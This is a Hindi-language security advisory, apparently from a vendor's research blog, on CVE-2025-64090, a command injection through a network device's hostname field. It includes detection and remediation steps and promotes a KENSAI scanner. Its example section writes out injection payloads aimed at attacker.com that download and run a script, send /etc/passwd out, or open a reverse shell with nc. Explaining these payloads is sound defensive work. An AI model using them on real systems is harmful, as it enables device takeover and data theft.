CVE-2025-64090: डिवाइस Hostname फ़ील्ड के ज़रिए कमांड इंजेक्शन पूर्ण सिस्टम कॉम्प्रोमाइज़ सक्षम करता है
ऑथेंटिकेटेड हमलावर डिवाइस के hostname फ़ील्ड में शेल मेटाकैरेक्टर इंजेक्ट करके मनमाने OS कमांड निष्पादित कर सकते हैं। CVSS 10.0। नेटवर्क डिवाइस और एम्बेडेड सिस्टम में एक सामान्य भेद्यता श्रेणी जो लगातार क्रिटिकल प्रभाव देती है।
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2025-64090 |
| गंभीरता | क्रिटिकल (CVSS 3.1: 10.0) |
| भेद्यता प्रकार | OS कमांड इंजेक्शन (CWE-78) |
| प्रकाशित | 9 जनवरी 2026 |
| ऑथेंटिकेशन आवश्यक | हाँ (लो प्रिविलेज) |
| अटैक वेक्टर | नेटवर्क |
CVE-2025-64090 क्या है?
CVE-2025-64090 एक कमांड-इंजेक्शन भेद्यता है जहाँ डिवाइस के hostname कॉन्फ़िगरेशन फ़ील्ड को बिना सैनिटाइज़ किए एक अंतर्निहित शेल-कमांड में पास किया जाता है। शेल मेटाकैरेक्टर (;, |, `, $()) को hostname वैल्यू में डालकर, ऑथेंटिकेटेड हमलावर इच्छित कमांड-संदर्भ से बाहर निकल सकते हैं और डिवाइस की मैनेजमेंट-प्रोसेस के विशेषाधिकार के साथ मनमाने OS कमांड निष्पादित कर सकते हैं — आमतौर पर root।
यह भेद्यता श्रेणी नेटवर्क डिवाइस, IoT हार्डवेयर, राउटर, फ़ायरवॉल, और एम्बेडेड Linux सिस्टम में व्यापक है जहाँ वेब-आधारित मैनेजमेंट इंटरफ़ेस बिना उचित सैनिटाइज़ेशन के यूज़र-प्रदत्त कॉन्फ़िगरेशन वैल्यू से शेल-कमांड बनाते हैं।
⚠ पूर्ण कॉम्प्रोमाइज़ के लिए कम बाधा
कोई भी ऑथेंटिकेटेड यूज़र — लो-प्रिविलेज अकाउंट सहित — root-स्तर का कमांड-एक्ज़ीक्यूशन हासिल कर सकता है। जिन वातावरण में डिफ़ॉल्ट या कमज़ोर क्रेडेंशियल मौजूद हैं, वहाँ यह प्रभावी रूप से अनऑथेंटिकेटेड शोषण बन जाता है।
कमांड इंजेक्शन मैकेनिक्स
# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)
# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`
# Subshell:
$(id > /var/www/html/pwned.txt)
# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh
प्रभावित वर्ज़न
विशिष्ट हार्डवेयर मॉडल और फ़र्मवेयर वर्ज़न के लिए वेंडर एडवाइज़री देखें। hostname कॉन्फ़िगरेशन उजागर करने वाले वेब-आधारित मैनेजमेंट इंटरफ़ेस वाले नेटवर्क डिवाइस प्राथमिक जोखिम-सतह हैं।
पहचान विधियाँ
Hostname इंजेक्शन के लिए टेस्टिंग
# Manual test: submit hostname with command injection payload # Use time-delay to confirm blind injection POST /admin/network/hostname hostname=test%3Bsleep%205 # If response delays ~5 seconds: vulnerable # Out-of-band confirmation: hostname=test%3Bnslookup+attacker.burpcollaborator.net
🔍 KENSAI पहचान: KENSAI का डिवाइस सुरक्षा स्कैनर hostname, DNS, NTP, और SNMP कॉन्फ़िगरेशन सहित मैनेजमेंट-इंटरफ़ेस फ़ील्ड को OS कमांड इंजेक्शन के लिए टेस्ट करता है। CVE-2025-64090 पैटर्न नेटवर्क-डिवाइस असेसमेंट प्रोफ़ाइल में शामिल हैं।
सुधार कदम
- वेंडर फ़र्मवेयर अपडेट लागू करें तुरंत।
- इनपुट वैलिडेशन: Hostname फ़ील्ड को केवल अल्फ़ान्यूमेरिक कैरेक्टर और हाइफ़न स्वीकार करने चाहिए (RFC 952/1123 कम्प्लायंट)।
- सुरक्षित API का उपयोग करें: शेल-कमांड निर्माण को ऐसे सिस्टम-कॉल से बदलें जो आर्गुमेंट-ऐरे स्वीकार करते हों (कोई शेल इंटरपोलेशन नहीं)।
- मैनेजमेंट इंटरफ़ेस प्रतिबंधित करें: फ़ायरवॉल नियमों के ज़रिए मैनेजमेंट UI तक पहुँच को विश्वसनीय IP रेंज तक सीमित करें।
- डिफ़ॉल्ट क्रेडेंशियल बदलें: सुनिश्चित करें कि सभी मैनेजमेंट-अकाउंट मज़बूत, यूनीक पासवर्ड का उपयोग करते हैं।
- नेटवर्क विभाजन: मैनेजमेंट इंटरफ़ेस को यूज़र-सुलभ नेटवर्क से अलग रखें।
आपके नेटवर्क डिवाइस में कमांड इंजेक्शन?
KENSAI नेटवर्क डिवाइस और मैनेजमेंट इंटरफ़ेस को CVE-2025-64090 सहित कमांड-इंजेक्शन भेद्यताओं के लिए स्कैन करता है। हमलावरों के पैर जमाने से पहले भेद्य डिवाइस की पहचान करें।
नेटवर्क डिवाइस मुफ़्त में स्कैन करेंKENSAI सुरक्षा शोध टीम द्वारा प्रकाशित · अधिक CVE विश्लेषण